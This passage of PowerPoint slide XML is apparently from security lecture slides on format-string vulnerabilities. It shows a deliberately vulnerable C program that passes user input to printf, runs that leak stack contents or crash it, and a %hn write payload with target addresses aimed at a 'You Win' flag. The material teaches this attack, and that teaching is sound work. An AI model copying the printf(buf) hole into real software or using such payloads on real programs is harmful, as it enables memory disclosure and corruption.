                </a:solidFill>
              </a:rPr>
              <a:t>(filled by 0)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful to change bytes_written so far</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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%&lt;positive integer&gt;$&lt;fmt&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specify arg index</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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%12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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n</a:t>
            </a:r>
            <a:endParaRPr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2" name="Shape 2072"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2073" name="Shape 2073"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  1 #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  2 #include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  3</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  4 int flag = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  5</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  6 int main(int argc, char **argv) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  7 	char buf[1024];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  8 	if (argc &lt; 2) return 1;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 10 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0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printf(buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 11 	printf("\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 12</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 13 	if (flag == 0x13371337) {		// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0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How to win</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 14     	printf("You Win!\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 15 	}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 16</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 17 	return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 18 }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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" name="Shape 2078"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2079" name="Shape 2079"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$ ./fmt %x:%x:%x:%x:%x:%x</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ffffda9c:3ff:1b1ea4:253a7825:78253a78:3a78253a</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$ ./fmt %s:%s:%s:%s:%s:%s</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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4" name="Shape 2084"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2085" name="Shape 2085"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2265100"/>
            <a:ext cx="2598400" cy="713600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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%4911x%7$hn%65536x%8$hn</a:t>
            </a:r>
            <a:endParaRPr sz="1867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086" name="Shape 2086"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2978700"/>
            <a:ext cx="2598400" cy="574800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a036</a:t>
            </a:r>
            <a:endParaRPr sz="1867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087" name="Shape 2087"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="3553500"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a034</a:t>
            </a:r>
            <a:endParaRPr sz="1867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088" name="Shape 2088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="4066833"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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....</a:t>
            </a:r>
            <a:endParaRPr sz="1867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089" name="Shape 2089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="4577633"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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Fmt str pointer</a:t>
            </a:r>
            <a:endParaRPr sz="1867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090" name="Shape 2090"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="1650600"/>
            <a:ext cx="1299200" cy="5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High Addr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091" name="Shape 2091"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="5175233"/>
            <a:ext cx="1299200" cy="5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Low Addr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092" name="Shape 2092"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451300" y="1838933"/>
            <a:ext cx="7066400" cy="4673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" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  1 #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  2 #include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  3</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  4 int flag = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  5</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  6 int main(int argc, char **argv) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  7 	char buf[1024];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  8 	if (argc &lt; 2) return 1;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 10 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0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printf(buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 11 	printf("\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 12</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 13 	if (flag == 0x13371337) {		// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0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How to win</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 14     	printf("You Win!\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 15 	}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
